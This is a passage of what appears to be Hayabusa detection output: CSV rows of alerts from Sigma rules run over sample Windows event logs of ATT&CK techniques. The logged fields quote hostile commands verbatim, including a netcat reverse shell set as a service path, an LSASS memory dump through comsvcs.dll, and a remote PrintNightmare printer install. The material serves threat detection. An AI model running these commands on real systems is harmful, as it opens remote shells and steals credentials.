0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx +2021-10-07 15:36:24.892 +00:00,win10-02.offsec.lan,4688,medium,Persis,Service ImagePath Change with Reg.exe,,rules/sigma/process_creation_builtin/proc_creation_win_reg_service_imagepath_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx +2021-10-07 15:36:24.892 +00:00,win10-02.offsec.lan,4688,medium,Persis,Modification Of Existing Services For Persistence,,rules/sigma/process_creation_builtin/proc_creation_win_modif_of_services_for_via_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx +2021-10-07 18:21:36.864 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx +2021-10-07 18:21:36.889 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Set-ItemProperty -path HKLM:\System\CurrentControlSet\services\xboxgip -name ImagePath -value ""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx +2021-10-07 18:21:37.136 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-ItemProperty): ""Set-ItemProperty"" ParameterBinding(Set-ItemProperty): name=""Path""; value=""HKLM:\System\CurrentControlSet\services\xboxgip"" ParameterBinding(Set-ItemProperty): name=""Name""; value=""ImagePath"" ParameterBinding(Set-ItemProperty): name=""Value""; value=""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx +2021-10-07 18:21:37.137 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx +2021-10-07 18:21:37.143 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx +2021-10-07 18:21:37.146 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx +2021-10-07 18:30:51.237 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx +2021-10-07 18:30:51.247 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Set-ItemProperty -path HKLM:\System\CurrentControlSet\services\xboxgip -name FailureCommand -value ""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx +2021-10-07 18:30:51.251 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-ItemProperty): ""Set-ItemProperty"" ParameterBinding(Set-ItemProperty): name=""Path""; value=""HKLM:\System\CurrentControlSet\services\xboxgip"" ParameterBinding(Set-ItemProperty): name=""Name""; value=""FailureCommand"" ParameterBinding(Set-ItemProperty): name=""Value""; value=""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx +2021-10-07 18:30:51.252 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx +2021-10-07 18:30:51.266 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx +2021-10-07 18:30:51.269 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx +2021-10-08 08:53:42.131 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc sdset xboxgip ""D:(A;;CCLCSWRPWPDTLOCRRC;;;SY) | Path: C:\Windows\System32\sc.exe | PID: 0x1d28 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (sc).evtx +2021-10-08 10:05:29.432 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\XblGameSave\Security"" /v Security /t REG_BINARY /d fe340ead | Path: C:\Windows\System32\reg.exe | PID: 0x18c4 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (registry).evtx +2021-10-08 10:05:29.432 +00:00,win10-02.offsec.lan,4688,low,Disc,Query Registry,,rules/sigma/process_creation_builtin/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (registry).evtx +2021-10-08 10:05:36.298 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2af0 | User: WIN10-02$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (registry).evtx +2021-10-08 12:56:58.803 +00:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:04.504 +00:00,fs01.offsec.lan,4688,critical,PrivEsc,SystemNightmare Exploitation Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_exploit_systemnightmare.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:04.504 +00:00,fs01.offsec.lan,4688,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_builtin/proc_creation_win_local_system_owner_account_discovery.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:04.504 +00:00,fs01.offsec.lan,4688,medium,LatMov,Mounted Windows Admin Shares with net.exe,,rules/sigma/process_creation_builtin/proc_creation_win_net_use_admin_share.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:04.504 +00:00,fs01.offsec.lan,4688,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation_builtin/proc_creation_win_susp_network_listing_connections.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:04.504 +00:00,fs01.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:06.763 +00:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: gentilguest | IP Address: 20.188.56.147 | Process: | Target Server: printnightmare.gentilkiwi.com,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:06.763 +00:00,fs01.offsec.lan,4648,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:06.869 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: rundll32 printui.dll,PrintUIEntry /in /n""\\printnightmare.gentilkiwi.com\Kiwi Legit Printer"" | Path: C:\Windows\System32\rundll32.exe | PID: 0x1670 | User: admmig | LID: 0x65b0f5db",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:06.869 +00:00,fs01.offsec.lan,4688,critical,PrivEsc,SystemNightmare Exploitation Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_exploit_systemnightmare.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:06.869 +00:00,fs01.offsec.lan,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:06.869 +00:00,fs01.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:18.646 +00:00,fs01.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:19.072 +00:00,fs01.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:21.674 +00:00,fs01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-19 14:33:13.262 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx +2021-10-19 14:33:15.518 +00:00,FS03.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx +2021-10-19 14:33:15.533 +00:00,FS03.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx +2021-10-19 14:40:28.001 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx +2021-10-19 14:40:40.675 +00:00,FS03.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx +2021-10-19 14:40:40.691 +00:00,FS03.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx +2021-10-19 14:42:41.202 +00:00,FS03.offsec.lan,4688,medium,Persis,Net.exe User Account Creation,,rules/sigma/process_creation_builtin/proc_creation_win_net_user_add.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx +2021-10-19 14:42:41.202 +00:00,FS03.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx +2021-10-19 14:42:41.218 +00:00,FS03.offsec.lan,4688,medium,Persis,Net.exe User Account Creation,,rules/sigma/process_creation_builtin/proc_creation_win_net_user_add.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx +2021-10-19 14:42:41.218 +00:00,FS03.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx +2021-10-19 14:42:41.234 +00:00,FS03.offsec.lan,4720,low,Persis,Local User Account Created,User: toto3 | SID: S-1-5-21-3410678313-1251427014-1131291384-1004,rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx +2021-10-19 14:44:30.780 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx +2021-10-19 14:44:36.789 +00:00,FS03.offsec.lan,4688,low,Disc,Windows Network Enumeration,,rules/sigma/process_creation_builtin/proc_creation_win_net_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx +2021-10-19 14:44:36.789 +00:00,FS03.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx +2021-10-19 14:44:39.367 +00:00,FS03.offsec.lan,4688,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation_builtin/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx +2021-10-19 14:45:16.394 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx +2021-10-19 14:45:18.182 +00:00,FS03.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx +2021-10-19 14:45:18.198 +00:00,FS03.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx +2021-10-20 09:18:07.101 +00:00,FS03.offsec.lan,11,medium,,File Created_Sysmon Alert,T1003 | Path: C:\Windows\System32\mimilsa.log | Process: C:\Windows\system32\lsass.exe | PID: 512 | PGUID: 7CF65FC7-6649-6165-0B00-000000001200,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-Mimikatz LSA SSP clear text password exfiltration.evtx +2021-10-20 09:18:07.101 +00:00,FS03.offsec.lan,11,critical,CredAccess,Mimikatz MemSSP Default Log File Creation,,rules/sigma/file_event/file_event_win_mimimaktz_memssp_log_file.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-Mimikatz LSA SSP clear text password exfiltration.evtx +2021-10-20 13:39:12.731 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 13:39:17.315 +00:00,FS03.offsec.lan,4624,info,,Logon Type 9 - NewCredentials,User: admmig | Computer: - | IP Addr: ::1 | LID: 0x266e045 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 13:39:17.315 +00:00,FS03.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 13:39:17.315 +00:00,FS03.offsec.lan,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 13:39:17.315 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x266e045,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 13:39:21.730 +00:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 14:18:43.326 +00:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:43.326 +00:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:55.808 +00:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x269eec8 | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200 | Hash: SHA1=9F1E24917EF96BBB339F4E2A226ACAFD1009F47B,MD5=C031E215B8B08C752BF362F6D4C5D3AD,SHA256=840E1F9DC5A29BEBF01626822D7390251E9CF05BB3560BA7B68BDB8A41CF08E3,IMPHASH=099B747A4A31983374E54912D4BB7C44",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:55.808 +00:00,FS03.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:55.808 +00:00,FS03.offsec.lan,1,high,Exec,WMI Spawning Windows PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:55.808 +00:00,FS03.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:55.808 +00:00,FS03.offsec.lan,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:55.808 +00:00,FS03.offsec.lan,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:55.808 +00:00,FS03.offsec.lan,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation_sysmon/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:55.808 +00:00,FS03.offsec.lan,1,high,CredAccess,PowerShell Get-Process LSASS,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:55.855 +00:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:55.871 +00:00,FS03.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Image: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\3e50931f5376ebab490b124f3f46dd45\System.Management.Automation.ni.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200 | Hash: SHA1=BFDFC46117000B652897F1DE8084FBB9EAA66384,MD5=6EF679145F15A8E54FBF9B23A25A6F21,SHA256=240674945FF5175A14E5DF6DEB2AECD04231911DE9103CA34F6D327C4FF86732,IMPHASH=00000000000000000000000000000000",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential 